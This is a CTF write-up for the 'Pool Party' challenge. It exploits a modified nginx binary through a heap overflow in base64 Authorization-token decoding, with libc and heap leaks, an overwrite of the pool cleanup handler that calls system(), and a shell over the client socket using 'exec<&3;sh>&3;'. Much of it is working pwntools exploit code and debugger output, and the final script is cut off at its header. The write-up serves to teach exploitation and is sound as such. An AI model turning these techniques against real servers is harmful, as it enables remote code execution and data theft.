Platypwn 2025 - Pool Party

Pool Party: nginx pool exploitation

Pool Party

“brrrrrrr” said the Platypus. It’s warm outside the water. “Time for a pool party”, it thinks. It has been a while since it met its fellow platypuses and a pool party is a clever idea to reunite. The Platypus decides to host a webserver to store the plans and figures that nginx is a good fit because it’s fast - almost as fast as the Platypus can use its 40000 electroreceptors on the bill to detect prey.

TL;DR

This challenge requires exploiting a modified nginx (/ɛn dʒɪŋks/, "en jinks") binary, which adds a handful of new functions that can be identified by the ngx_http_pp_ prefix.

We can exploit a heap BOF (buffer overflow), caused by missing size checks around the nginx function ngx_decode_base64, to overwrite a destructor inside the nginx pool struct and gain RIP & RDI control, which we use to extract the flag.

Overview

The first interesting thing about this challenge is that we don't get any attached files, which worried me for a bit, but after starting the instance we are immediately greeted with an nginx directory listing that includes seemingly all the challenge files, so let's go through them.

.
|-- Dockerfile
|-- compose.yaml
|-- entrypoint.sh
|-- libc.so.6
|-- nginx.conf
`-- nginx

First of all we have the Dockerfile, which installs the relevant dependencies and sets up the correct file structure and users. It also defines what to execute on startup: an entrypoint script that ends up running /challenge/nginx -g "daemon off;" -c /challenge/nginx.conf

Dockerfile

FROM ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04

RUN apt-get update && apt-get install -y zlib1g gdbserver \
    && rm -rf /var/lib/apt/lists/* \
    && groupadd -r ctf && useradd -r -g ctf ctf

USER ctf

WORKDIR /nginx
# Create directories for nginx
RUN mkdir modules conf logs

WORKDIR /challenge
COPY nginx.conf .
COPY --chmod=755 entrypoint.sh /entrypoint.sh
COPY --chmod=755 nginx .

ENTRYPOINT [ "/entrypoint.sh" ]
CMD ["/challenge/nginx", "-g", "daemon off;", "-c", "/challenge/nginx.conf"]

The entrypoint.sh just sets up the flag file (without removing the flag from the environment) and executes the provided CMD in an endless loop, so nginx is restarted whenever it exits.

entrypoint.sh

#!/bin/sh

if [ -z "$FLAG" ]; then
    echo "FLAG must be set"
    exit 1
fi

echo "$FLAG" > /nginx/flag.txt

while true; do
    "$@"
done

And the compose.yaml just sets the flag and adds port forwarding. It also adds the SYS_PTRACE capability, which we don't really need, but which could be exploited for a container escape. Note that it isn't actually required for debugging either, as PTRACE_TRACEME (which gdbserver uses) doesn't need that capability. One interesting thing though: personality ADDR_NO_RANDOMIZE (which disables ASLR for a single process) can't be used inside a Docker container without changing the seccomp profile JSON.

compose.yaml

services:
  poolparty:
    build: .
    ports:
      - "8080:8080"
    environment:
      - FLAG=PP{testflag}
    # Could be helpful for local debugging
    cap_add:
      - SYS_PTRACE

We also get the nginx configuration file nginx.conf, which enables a custom nginx directive called platypus for the locations /party and /restart.

nginx.conf

worker_processes 1;
events {}
error_log /dev/stderr;

http {
    server {
        listen 8080;
        access_log /dev/stdout;
        location / {
            alias /challenge/;
            autoindex on;
        }

        location /party {
            platypus;
        }

        location /restart {
            platypus;
        }
    }
}

And last but not least we have the nginx binary itself, which is an nginx server, slightly patched to add new functionality.

$ vagd info nginx
Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No
Comment:    GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0

Reversed Code:

int64_t ngx_http_pp_send_response_raw(int64_t arg1, int64_t arg2, int64_t arg3, void* arg4)

{
    void* fsbase;
    int64_t rax = *(uint64_t*)((char*)fsbase + 0x28);
    int64_t* rax_3 = ngx_palloc(*(uint64_t*)((char*)arg4 + 0x58), 0x50);
    int64_t result;

    if (rax_3)
    {
        *(uint64_t*)rax_3 = arg1;
        rax_3[1] = *(uint64_t*)rax_3 + arg2;
        rax_3[9] |= 2;
        rax_3[9] |= 0x80;
        int64_t* var_28 = rax_3;
        int64_t var_20_1 = 0;
        *(uint64_t*)((char*)arg4 + 0x210) = arg3;
        *(uint64_t*)((char*)arg4 + 0x2d8) = arg2;
        *(uint64_t*)((char*)arg4 + 0x2a8) = 0xa;
        *(uint64_t*)((char*)arg4 + 0x2b0) = "text/plain";
        int64_t result_1;

        if (!(*(uint8_t*)((char*)arg4 + 0x453) & 2))
            result_1 = ngx_http_send_header(arg4);

        if (*(uint8_t*)((char*)arg4 + 0x453) & 2 || !result_1)
        {
            int64_t result_2 = ngx_http_output_filter(arg4, &var_28);

            result = !result_2 ? 0 : result_2;
        }
        else
            result = result_1;
    }
    else
        result = -1;

    *(uint64_t*)((char*)fsbase + 0x28);

    if (rax == *(uint64_t*)((char*)fsbase + 0x28))
        return result;

    __stack_chk_fail();
    /* no return */
}


int64_t ngx_http_pp_send_response(char* msg, int64_t code, void* arg3)

{
    return ngx_http_pp_send_response_raw(msg, strlen(msg), code, arg3);
}


int64_t ngx_http_pp_cmd(void* arg1)

{
    int64_t rsi;
    int64_t var_28 = rsi;
    int64_t rdx;
    int64_t var_30 = rdx;
    **(uint64_t**)(*(uint64_t*)(*(uint64_t*)((char*)arg1 + 0x38) + 0x10)
        + (ngx_http_pp_module << 3)) = 1;
    *(uint64_t*)(*(uint64_t*)(*(uint64_t*)(*(uint64_t*)((char*)arg1 + 0x38) + 0x10)
        + (ngx_http_core_module << 3)) + 0x48) = ngx_http_pp_handler;
    return 0;
}


int64_t ngx_http_pp_party_get(void* arg1)

{
    if (party)
        return ngx_http_pp_send_response("Party is in progress", 200, arg1);

    return ngx_http_pp_send_response("Party is not in progress", 404, arg1);
}


int64_t ngx_http_pp_party_post(void* arg1)

{
    if (party)
        return ngx_http_pp_send_response("Party is already in progress", 0x195, arg1);

    party =
        ngx_create_pool(0x1000, *(uint64_t*)(*(uint64_t*)((char*)arg1 + 0x58) + 0x48));
    return ngx_http_pp_send_response("Party started", 200, arg1);
}


void* ngx_http_pp_party_add(uint64_t arg1)

{
    if (!*(uint64_t*)(arg1 + 0x2f8))
        return ngx_http_finalize_request(arg1, 0x1f4);

    int64_t count = 0;

    for (int64_t* i = *(uint64_t*)(*(uint64_t*)(arg1 + 0x2f8) + 8); i; i = i[1])
    {
        int64_t rax_24;

        if (*(uint8_t*)(*(uint64_t*)i + 0x48) & 1
                || *(uint8_t*)(*(uint64_t*)i + 0x48) & 2
                || *(uint8_t*)(*(uint64_t*)i + 0x48) & 4)
            rax_24 = *(uint64_t*)(*(uint64_t*)i + 8) - **(uint64_t**)i;
        else
            rax_24 = *(uint64_t*)(*(uint64_t*)i + 0x18)
                - *(uint64_t*)(*(uint64_t*)i + 0x10);

        count += rax_24;
    }

    char* platypus = ngx_palloc(party, 0x100);  // platypus

    if (platypus)
        return ngx_http_finalize_request(arg1, 
            ngx_http_pp_send_response_raw(platypus, 
                ngx_sprintf(platypus, "%z platypuses added to the party", count, 
                    "%z platypuses added to the party") - platypus, 
                201, arg1));

    return ngx_http_finalize_request(arg1, 500);
}


int64_t ngx_http_pp_party_put(void* arg1)

{
    if (!party)
        return ngx_http_pp_send_response(
            "You can't add Platypus to a non-existent party", 0x195, arg1);

    int64_t result = ngx_http_read_client_request_body(arg1, ngx_http_pp_party_add);

    if (result <= 0x12b)
        return -4;

    return result;
}


int64_t ngx_http_pp_party_delete(void* arg1)

{
    if (!party)
        return ngx_http_pp_send_response("Party is not in progress", 0x195, arg1);

    ngx_destroy_pool(party);
    party = 0;
    return ngx_http_pp_send_response("Party ended", 0xc8, arg1);
}


int64_t ngx_http_pp_handler(void* arg1)

{
    if (!strncmp(*(uint64_t*)((char*)arg1 + 0x340), "/party", 6))
    {
        if (*(uint64_t*)((char*)arg1 + 0x318) == 2)
            return ngx_http_pp_party_get(arg1);

        if (*(uint64_t*)((char*)arg1 + 0x318) == 8)
            return ngx_http_pp_party_post(arg1);

        if (*(uint64_t*)((char*)arg1 + 0x318) == 0x10)
            return ngx_http_pp_party_put(arg1);

        if (*(uint64_t*)((char*)arg1 + 0x318) == 0x20)
            return ngx_http_pp_party_delete(arg1);
    }

    if (strncmp(*(uint64_t*)((char*)arg1 + 0x340), "/restart", 8))
        return ngx_http_pp_send_response("There is no party here", 0x194, arg1);

    system("pkill nginx");
    return 0xc8;
}


int64_t ngx_http_pp_access_check(void* arg1)

{
    void* fsbase;
    int64_t rax = *(uint64_t*)((char*)fsbase + 0x28);
    int64_t result;

    if (!**(uint64_t**)(*(uint64_t*)((char*)arg1 + 0x28) + (ngx_http_pp_module << 3)))
        result = -5;
    else if (*(uint64_t*)((char*)arg1 + 0x138))
    {
        void* val = *(uint64_t*)((char*)arg1 + 0x138);
        int32_t rax_13;

        if (*(uint64_t*)((char*)val + 0x18) >= 7)
            rax_13 = strncmp(*(uint64_t*)((char*)val + 0x20), "Bearer ", 7);

        if (*(uint64_t*)((char*)val + 0x18) >= 7 && !rax_13)
        {
            char* rax_16 = ngx_palloc(*(uint64_t*)((char*)arg1 + 0x58), 0x1000);

            if (rax_16)
            {
                int64_t var_38 = *(uint64_t*)((char*)val + 0x18) - 7;
                int64_t var_30_1 = 7 + *(uint64_t*)((char*)val + 0x20);
                int64_t var_28 = 0x1000;
                char* var_20_1 = rax_16;

                if (!ngx_decode_base64(&var_28, &var_38))
                {
                    if (!strncmp(rax_16, "ornithorhynchus anatinus", 0x18))
                        result = -5;
                    else
                    {
                        char* rax_27 =
                            ngx_palloc(*(uint64_t*)((char*)arg1 + 0x58), 0x40);

                        if (rax_27)
                        {
                              memcpy(&rax_16[0x2a], "...", 4);
                            result = ngx_http_pp_send_response_raw(rax_27, 
                                ngx_sprintf(rax_27, "Token invalid: %s", rax_16, 
                                    "Token invalid: %s") - rax_27, 
                                0x191, arg1);
                        }
                        else
                            result = 0x1f4;
                    }
                }
                else
                    result = ngx_http_pp_send_response("Invalid token", 0x191, arg1);
            }
            else
                result = 0x1f4;
        }
        else
            result = 0x191;
    }
    else
        result = 0x191;

    *(uint64_t*)((char*)fsbase + 0x28);

    if (rax == *(uint64_t*)((char*)fsbase + 0x28))
        return result;

    __stack_chk_fail();
    /* no return */
}


int64_t ngx_http_pp_postconfiguration(void* arg1)

{
    int64_t (** rax_7)(void* arg1) = ngx_array_push(
        *(uint64_t*)(**(uint64_t**)((char*)arg1 + 0x38) + (ngx_http_core_module << 3))
        + 0x1d8);

    if (!rax_7)
        return -1;

    *(uint64_t*)rax_7 = ngx_http_pp_access_check;
    return 0;
}


int64_t* ngx_http_pp_create_loc_conf(void* arg1)

{
    int64_t* result = ngx_pcalloc(*(uint64_t*)((char*)arg1 + 0x18), 8);

    if (!result)
        return nullptr;

    *(uint64_t*)result = -1;
    return result;
}


int64_t ngx_http_pp_merge_loc_conf(int64_t arg1, int64_t* arg2, int64_t* arg3)

{
    int64_t var_20 = arg1;

    if (*(uint64_t*)arg3 == -1)
    {
        int64_t rax_7;

        if (*(uint64_t*)arg2 == -1)
            rax_7 = 0;
        else
            rax_7 = *(uint64_t*)arg2;

        *(uint64_t*)arg3 = rax_7;
    }

    return 0;
}

The relevant execution flow looks like this:

ngx_http_pp_access_check
└►ngx_http_pp_handler
  ├►ngx_http_pp_party_get
  ├►ngx_http_pp_party_post
  ├►ngx_http_pp_party_delete
  └►ngx_http_pp_party_put
    └►ngx_http_pp_party_add

To start exploiting we can create a basic template using this command

vagd template ./nginx 10.80.11.174 8080 -e --libs --image ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04

and then add some setup code

  if not vm:
    vm = Dogd(BINARY, image=BOX, symbols=True, libs=True, ex=True, fast=True,   
              files=['./nginx.conf'], packages=['zlib1g'], forward={'8080/tcp': 8080})  # Docker
  if vm.is_new:
    # additional setup here
    vm.system('sudo mkdir /nginx').recvall()
    vm.system('sudo chown vagd:sudo /nginx').recvall()
    vm.system('sudo mkdir /challenge').recvall()
    vm.system('sudo chown vagd:sudo /challenge').recvall()
    vm.system('mkdir /nginx/modules /nginx/conf /nginx/logs').recvall()
    vm.system('echo NOT_THE_FLAG > /nginx/flag.txt').recvall()
  else:
    vm.system('pkill nginx').recvall()
    vm.system('rm /challenge/flag.txt').recvall()

Vulnerabilities

Let's go through the code and find some vulnerabilities. The implemented HTTP methods actually seem rather safe, notably because we don't get a lot of user control. We can create an nginx memory pool party through POST, add new entries through PUT (each one stores "%z platypuses added to the party", with %z being the content length, in a 0x100-sized buffer inside the allocated memory pool party), and finally delete the memory pool party through DELETE, which also frees all related entries. GET simply reports whether the party pool is currently allocated or not.
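
For reference, the whole /party API can be driven with plain HTTP. A minimal sketch using requests (an assumption for illustration; the exploit later talks to the raw socket instead), against an instance on localhost:8080:

import base64
import requests

URL = "http://localhost:8080/party"
token = base64.b64encode(b"ornithorhynchus anatinus").decode()
headers = {"Authorization": f"Bearer {token}"}

print(requests.post(URL, headers=headers).text)                    # "Party started"
print(requests.put(URL, headers=headers, data=b"A" * 0x6f).text)   # "111 platypuses added to the party"
print(requests.get(URL, headers=headers).text)                     # "Party is in progress"
print(requests.delete(URL, headers=headers).text)                  # "Party ended"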

There actually isn't any conventional heap vulnerability here: no double free, no use after free, no buffer overflow. We also don't have any user-controllable parameters.

So let's look at the only other promising part, ngx_http_pp_access_check:

This code checks for the existence of an Authorization header and an access token, which should be the base64-encoded string ornithorhynchus anatinus (the scientific name of the platypus). The check isn't done correctly though, and any token works (this seems to be an oversight by the author): even the "Token invalid" path ends up returning success to the access phase, so if we ignore the response's Content-Length we actually receive more data afterwards, which corresponds to the HTTP method handlers.

After the check, ngx_http_pp_handler executes the handler for the corresponding HTTP method.

ASLR Leaks

The first interesting issue is that ngx_http_pp_access_check allocates a buffer of size 0x1000 with char* token = ngx_palloc(request_pool, 0x1000); and then calls ngx_decode_base64(token, token_b64) (a function for which I didn't find any documentation online; it is part of nginx core and expects the caller to have sized the destination buffer, e.g. via ngx_base64_decoded_length). Also, if the token is invalid, the decoded token is echoed back via ngx_sprintf(buffer, "Token invalid: %s", token). This is interesting because null byte termination is never enforced, and by writing a simple PoC we actually get a libc leak:

invalid_token = flat(b'Authorization: Bearer ', b64e(b'x').encode(), b'\r\n')
se(build_header('/party', 'GET', headers=[invalid_token]))
it()

So why does this happen? Let's try to understand how nginx pools work:

nginx pools

So how exactly do nginx pools work?

Let's allocate a memory pool using POST /party, add some entries using PUT, and then look at how the heap is laid out afterwards.

token = flat(b'Authorization: Bearer ', b64e(b'ornithorhynchus anatinus').encode(), b'\r\n')
se(build_header('/party', 'POST', headers=[token]))
ru(b'\r\n\r\n')

data = cyc(0x6f)
for i in range(0x8):
  se(build_header('/party', 'PUT', data, headers=[token]) + data)
  ru(b'\r\n\r\n')

se(build_header('/party', 'DELETE', headers=[token]))
ru(b'\r\n\r\n')
it()

The first thing you might notice is that using the pwndbg heap command actually doesn't work and tries to enumerate the heap from the wrong starting address:

pwndbg> heap
Addr: 0x5555556d3010
Size: 0x00 (with flag bits: 0x00)

But we can easily fix this by specifying the correct heap start 0x555555691000. This also confirms that nginx pools are an abstraction layer above the libc allocator (in this case glibc ptmalloc) that chains multiple allocations together through pools.

pwndbg> heap 0x555555691000
Allocated chunk | PREV_INUSE
Addr: 0x555555691000
Size: 0x290 (with flag bits: 0x291)

...

Allocated chunk | PREV_INUSE
Addr: 0x555555697ce0
Size: 0x1010 (with flag bits: 0x1011)

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x555555698cf0
Size: 0x2020 (with flag bits: 0x2021)
fd: 0x7ffff7f54b20
bk: 0x7ffff7f54b20

Allocated chunk
Addr: 0x55555569ad10
Size: 0x1010 (with flag bits: 0x1010)

...
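
This layout is explained by how ngx_palloc works in the public nginx sources: requests that fit below the pool's max are bump-allocated inside the current pool block, while larger requests go straight to malloc and are only tracked by the pool. A rough model (an assumption based on stock nginx; the patched binary may differ):

# Toy model of ngx_palloc, simplified from nginx's src/core/ngx_palloc.c
def ngx_palloc_model(pool, size):
    if size <= pool['max']:
        addr = pool['last']               # bump allocator inside the pool block
        pool['last'] += size
        return ('in-pool', addr)
    pool['large'].append(size)            # ngx_palloc_large: gets its own glibc chunk,
    return ('large', size)                # freed later by ngx_destroy_pool

pool = {'last': 0x50, 'max': 0xfb0, 'large': []}
print(ngx_palloc_model(pool, 0x100))      # the PUT entries land inside the party pool
print(ngx_palloc_model(pool, 0x1000))     # the 0x1000 token buffer becomes its own chunk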

Setting the correct breakpoints, we can see that 0x555555697ce0 is the buffer we allocated for the decoded authorization token.

pwndbg> tel 0x555555697cf0
00:0000│  0x555555697cf0 ◂— 0x726f6874696e726f ('ornithor')
01:0008│  0x555555697cf8 ◂— 0x20737568636e7968 ('hynchus ')
02:0010│  0x555555697d00 ◂— 0x73756e6974616e61 ('anatinus')

The adjacent chunk at 0x55555569ad10 is actually used for the memory pool, which we can confirm because the PUT allocations are stored there:

pwndbg> search "111 platypuses added"
Searching for byte: b'111 platypuses added'
[heap]          0x55555569ad70 '111 platypuses added to the party'
[heap]          0x55555569ae70 '111 platypuses added to the party'
[heap]          0x55555569af70 '111 platypuses added to the party'
[heap]          0x55555569b070 '111 platypuses added to the party'
[heap]          0x55555569b170 '111 platypuses added to the party'
[heap]          0x55555569b270 '111 platypuses added to the party'
[heap]          0x55555569b370 '111 platypuses added to the party'
[heap]          0x55555569b470 '111 platypuses added to the party'

Excluding the heap header, we see that some sort of metadata is stored at the top of the memory pool, which will be important for exploitation.

pwndbg> tel 0x55555569ad20 12
00:0000│  0x55555569ad20 —▸ 0x55555569b570 ◂— 0
01:0008│  0x55555569ad28 —▸ 0x55555569bd20 ◂— 0
02:0010│  0x55555569ad30 ◂— 0
03:0018│  0x55555569ad38 ◂— 0
04:0020│  0x55555569ad40 ◂— 0xfb0
05:0028│  0x55555569ad48 —▸ 0x55555569ad20 —▸ 0x55555569b570 ◂— 0
06:0030│  0x55555569ad50 ◂— 0
... ↓     2 skipped
09:0048│  0x55555569ad68 —▸ 0x555555691fa0 ◂— 4
0a:0050│  0x55555569ad70 ◂— '111 platypuses added to the party'
0b:0058│  0x55555569ad78 ◂— 'ypuses added to the party'
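
This metadata matches the ngx_pool_t header from nginx's src/core/ngx_palloc.h (assuming the patched binary keeps the stock layout); annotated against the dump above:

# ngx_pool_t field offsets on 64-bit, matched against the telescope output
NGX_POOL_T = {
    0x00: 'd.last',    # 0x55555569b570: next free byte inside the pool block
    0x08: 'd.end',     # 0x55555569bd20: end of the pool block
    0x10: 'd.next',    # next pool block in the chain
    0x18: 'd.failed',
    0x20: 'max',       # 0xfb0: largest size still served from the pool itself
    0x28: 'current',   # points back to the pool itself
    0x30: 'chain',
    0x38: 'large',     # list of out-of-pool (malloc'd) allocations
    0x40: 'cleanup',   # ngx_pool_cleanup_t list {handler, data, next};
                       # handler(data) is called by ngx_destroy_pool
    0x48: 'log',       # 0x555555691fa0
}

The cleanup field at offset 0x40 is the "destructor" mentioned in the TL;DR and becomes the target of the overflow later.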

Knowing that we are dealing with glibc ptmalloc, our leak is due to a large bin chunk leaking its linked-list pointers through uninitialised memory. With that knowledge we can modify our PoC to also leak a heap address:

leak_libc_token = flat(b'Authorization: Bearer ', b64e(b'x').encode(), b'\r\n')
leak_heap_token = flat(b'Authorization: Bearer ', b64e(cyc(0x11)).encode(), b'\r\n')

se(build_header('/party', 'GET', headers=[leak_libc_token]))
ru(b'invalid: x')
libc.address = (upad(ru(b'Party', drop=True)) << 8) - 0x204200
lhex(libc.address, "libc")

se(build_header('/party', 'GET', headers=[leak_heap_token]))
ru(b'invalid: ' + cyc(0x11))
HEAP = (upad(ru(b'Party', drop=True)) << 8)
lhex(HEAP, "heap")

Heap BOF

So now we have ASLR leaks, but how do we get RCE? Recall that a buffer of size 0x1000 is allocated for the decoded token, but what happens if we send more than that?

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(cyc(0x2000)).encode(), b'\r\n']))
ru(b'\r\n\r\n')

Well sadly we get:

<html>
<head><title>400 Request Header Or Cookie Too Large</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>Request Header Or Cookie Too Large</center>
<hr><center>nginx/1.28.0</center>
</body>
</html>

OK, but what happens if we only send slightly more? (0x1200 bytes encode to roughly 0x1800 base64 characters, which still fits into nginx's default 8k large_client_header_buffers.)

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(cyc(0x1200)).encode(), b'\r\n']))
ru(b'\r\n\r\n')

That's a bingo! We have a heap BOF:

pwndbg> heap 0x555555691000
...
Allocated chunk | PREV_INUSE
Addr: 0x55555569bd10
Size: 0x1010 (with flag bits: 0x1011)

Free chunk (unsortedbin) | IS_MMAPED
Addr: 0x55555569cd20
Size: 0x6164706261637060 (with flag bits: 0x6164706261637062)
fd: 0x6166706261657062
bk: 0x6168706261677062
...

and shortly after we trigger an exception, malloc(): invalid size (unsorted), which raises SIGABRT.

So what if we try to allocate something into the unsorted bin, through our memory pool, then trigger the BOF?

se(build_header('/party', 'POST', headers=[token]))
ru(b'\r\n\r\n')

bof = flat({
  0x1010: [
    0x1020, 
    0x1011,
  ],               
}, length=0x1200)

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
ru(b'\r\n\r\n')

Interestingly, we don't crash. Now let's try to free the corrupted memory pool with DELETE.

se(build_header('/party', 'DELETE', headers=[token]))
ru(b'\r\n\r\n')

Interesting: we dereference RAX, which we control through our BOF, and if the result isn't zero we CALL it with OFFSET 8 BEING RDI!!!

──────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────
 RAX  0x617a706261797062 ('bpyabpza')
───────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────
  0x555555571815 <ngx_destroy_pool+34>    mov    rax, qword ptr [rax]     <Cannot dereference [0x617a706261797062]>
   0x555555571818 <ngx_destroy_pool+37>    test   rax, rax
   0x55555557181b <ngx_destroy_pool+40>    je     ngx_destroy_pool+62         <ngx_destroy_pool+62>

   0x55555557181d <ngx_destroy_pool+42>    mov    rax, qword ptr [rbp - 8]
   0x555555571821 <ngx_destroy_pool+46>    mov    rdx, qword ptr [rax]
   0x555555571824 <ngx_destroy_pool+49>    mov    rax, qword ptr [rbp - 8]
   0x555555571828 <ngx_destroy_pool+53>    mov    rax, qword ptr [rax + 8]
   0x55555557182c <ngx_destroy_pool+57>    mov    rdi, rax
   0x55555557182f <ngx_destroy_pool+60>    call   rdx
────────────────────────────────────[ DECOMP ]─────────────────────────────────────
   0x555555571842 <ngx_destroy_pool+79>  for (int64_t* i = *(arg1 + 0x40); i != 0; i = i[2])
  0x55555557181b <ngx_destroy_pool+40>      if (*i != 0)
   0x55555557182f <ngx_destroy_pool+60>          (*i)(i[1])
───────────────────────────────────[ BACKTRACE ]───────────────────────────────────
  0   0x555555571815 ngx_destroy_pool+34
   1   0x55555563f8fe ngx_http_pp_party_delete+72
   2   0x55555563f9e0 ngx_http_pp_handler+186
───────────────────────────────────────────────────────────────────────────────────

So basically all we have to do is point RAX at a controlled region inside our heap and fill it with [system, "CMD TO EXECUTE;"], as sketched below.
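
In terms of the cleanup records that ngx_destroy_pool walks, the fake entry looks roughly like this (a sketch using the pwntools helpers from the exploit template; CMD_ADDR is a placeholder for the heap address of our command string):

# fake ngx_pool_cleanup_t record: ngx_destroy_pool calls handler(data)
fake_cleanup = flat([
    libc.sym.system,   # handler -> RIP
    CMD_ADDR,          # data    -> RDI, pointer to "CMD TO EXECUTE;"
    0,                 # next    -> 0 stops the walk after one entry
])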

Exploitation

So naturally we modify our exploit to call system("CMD"), which works locally.

se(build_header('/party', 'POST', headers=[token]))
ru(b'\r\n\r\n')

CMD = b'cp /nginx/flag.txt /challenge/flag.txt;'
bof = flat({
  0: [
    libc.sym.system,
    HEAP+OFF+0x10,
  ],
  0x10: CMD,
  0x1010: [
    0x1020, 
    0x1011,
  ],
  0x1010+0x50: HEAP+OFF              
}, length=0x1200)

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
ru(b'\r\n\r\n')
se(build_header('/party', 'DELETE', headers=[token]))
ru(b'\r\n\r\n')

Sadly, when we try to run it against the remote instance it doesn't work :(. This seems to happen because the heap offset is different. So let's run it against the locally running instance started with compose.yaml. Now we notice something even worse: the heap offset is different once again! Adjusting for the heap base we get:

  HEAP -= (0x9200 if args.LOCAL else 0x9400) if args.REMOTE else 0x8d00

This happens even though we restart the nginx binary (and therefore the heap) before running the exploit:

se(build_header('/restart', 'GET', headers=[token]))
cl()

So how do we fix this? Luckily the offsets don't differ too much between remote and local execution. Additionally we know that the BOF is relative (so no issues there) and we have about 0x1000 bytes to spray the data we need. Also, all the offsets are at least 0x10 aligned. So we use the first 0x800 bytes to spray our CMD payload, and the next 0x800 to spray the RIP+RDI control struct:

  cmd = b'cp /nginx/flag.txt /challenge/flag.txt;'

  OFF = 0x9000+0x200*i
  bof = flat({
    0x00: cmd*((0x800//len(cmd))),
    0x800: [libc.sym.system, HEAP + OFF]*0x80,
    0x1010: [
      0x1020, 
      0x1011,
    ],       
    0x1010+0x50: [HEAP + OFF + 0x800]
  }, length=0x1200)

  # c 2 
  se(build_header('/party', 'POST', 
                  headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
  ru(b'\r\n\r\n')

Now all we have left to do is retrieve the flag:

  t = get_target() if args.REMOTE else remote('localhost', 8080) 
  se(build_header('/flag.txt', 'GET', headers=[token]))
  ru(b'\r\n\r\n')
  flag = rls(t)
  print(flag)

Getting Shell

After the CTF ended I played around with this challenge (and fileserver) to try and get an interactive shell through the open socket. In the fileserver challenge, we extracted the flag like this: ./readflag>&5;, which uses sh redirection syntax to forward output (stdout) to file descriptor 5 (our client socket). So naturally I tried something like sh>&5<&5; to get a fully interactive shell, which sadly didn't work and threw the error: sh: 1: Syntax error: redirection unexpected

But from testing I saw that sh<&5; works, and we can extract data by e.g. executing id >&5;. This is a bit cumbersome, so after some research I found that you can set up persistent redirections with exec, e.g. exec >out.log. Using this, I can set up a global redirection with exec>&5; and then a shell reading from the socket with sh<&5;, giving a fully interactive shell through the open socket (without requiring e.g. outgoing internet connections like a reverse shell would). Combined, we execute exec>&5;sh<&5;
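
To convince yourself the redirections behave as expected, here is a minimal local sketch (assumptions: a Linux box with /bin/sh, Python 3, and fd 5 picked arbitrarily to mirror the fileserver challenge) that reproduces the trick with a socketpair:

import os
import socket
import subprocess

ours, theirs = socket.socketpair()
os.dup2(theirs.fileno(), 5)          # expose the child's end of the socketpair as fd 5
child = subprocess.Popen(['sh', '-c', 'exec >&5; sh <&5'], pass_fds=(5,))

ours.sendall(b'id\n')                # commands go in over the socket...
print(ours.recv(4096).decode())      # ...and the output comes back over the same socket
ours.sendall(b'exit\n')
child.wait()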

Now we can port this technique to our nginx server. One easy way to find the correct file descriptors is to either halt the process using gdb, or execute sleep inf; and enumerate the file descriptors using sudo ls -l /proc/PID/fd. Below we can see that fd 3 is the client socket and fd 6 is probably the listening socket, which we infer from the higher (client socket) and lower (listening socket) inode numbers.

sudo ls -l /proc/$(pgrep -f "sleep inf")/fd
lrwx------ 1 999 999 64 Nov 21 13:39 0 -> /dev/null
l-wx------ 1 999 999 64 Nov 21 13:39 1 -> 'pipe:[182217]'
l-wx------ 1 999 999 64 Nov 21 13:39 2 -> 'pipe:[182218]'
lrwx------ 1 999 999 64 Nov 21 13:39 3 -> 'socket:[249876]'
lrwx------ 1 999 999 64 Nov 21 13:39 6 -> 'socket:[246975]'
lrwx------ 1 999 999 64 Nov 21 13:39 8 -> 'anon_inode:[eventpoll]'
lrwx------ 1 999 999 64 Nov 21 13:39 9 -> 'anon_inode:[eventfd]'

and we get an interactive shell:

  cmd = b'exec<&3;sh>&3;'

  OFF = 0x9000+0x200*i
  bof = flat({
    0x00: cmd*((0x800//len(cmd))),
    0x800: [libc.sym.system, HEAP + OFF]*0x80,
    0x1010: [
      0x1020, 
      0x1011,
    ],       
    0x1010+0x50: [HEAP + OFF + 0x800]
  }, length=0x1200)

  # c 2 
  se(build_header('/party', 'POST', 
                  headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
  ru(b'\r\n\r\n')

  se(build_header('/party', 'DELETE', headers=[token]))
  try:
    sl('echo PWN; id; cat /nginx/flag.txt;')
    ru('PWN')
    it()
  except EOFError:
    cl()
    continue

Note: it is important that both commands get executed in order, so we need to change the order to exec<&3;sh>&3;; this makes sh terminate if stdout doesn't exist due to the missing redirection (stdin being /dev/null by default). Alternatively, we can spray a command sled (e.g. true;) and execute the real payload at the end, as sketched below.
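
The sled variant would look roughly like this (a sketch; even if system() lands in the middle of a true; token, sh just reports a harmless error and keeps executing the following commands until it reaches the payload):

cmd   = b'exec<&3;sh>&3;'
sled  = b'true;' * ((0x800 - len(cmd)) // len(b'true;'))
spray = sled + cmd                       # fills (almost) the whole 0x800 spray region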

Final Exploit

exploit.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ vagd template ./nginx 10.80.11.174 8080 -e --libs --image ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04
from pwn import *


GOFF   = 0x555555554000                               # GDB default base address
IP     = '127.0.0.1' if args.LOCAL else '127.0.0.1'   # remote IP
PORT   = 8081 if args.LOCAL else 8080                 # remote PORT
BINARY = './nginx'                                    # PATH to local binary
ARGS   = ['-g', 'daemon off;', '-c', '/home/vagd/nginx.conf']  # ARGS supplied to binary
ENV    = {}                                           # ENV supplied to binary
BOX    = 'ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04' # Docker box image

# GDB SCRIPT, executed at start of GDB session (e.g. set breakpoints here)
GDB    = f"""
set follow-fork-mode child

hb * system

c"""

context.binary = exe = ELF(BINARY, checksec=False)    # binary
context.aslr = False                                  # ASLR enabled (only GDB)

# abbreviations
cst = constants
shc = shellcraft

# logging
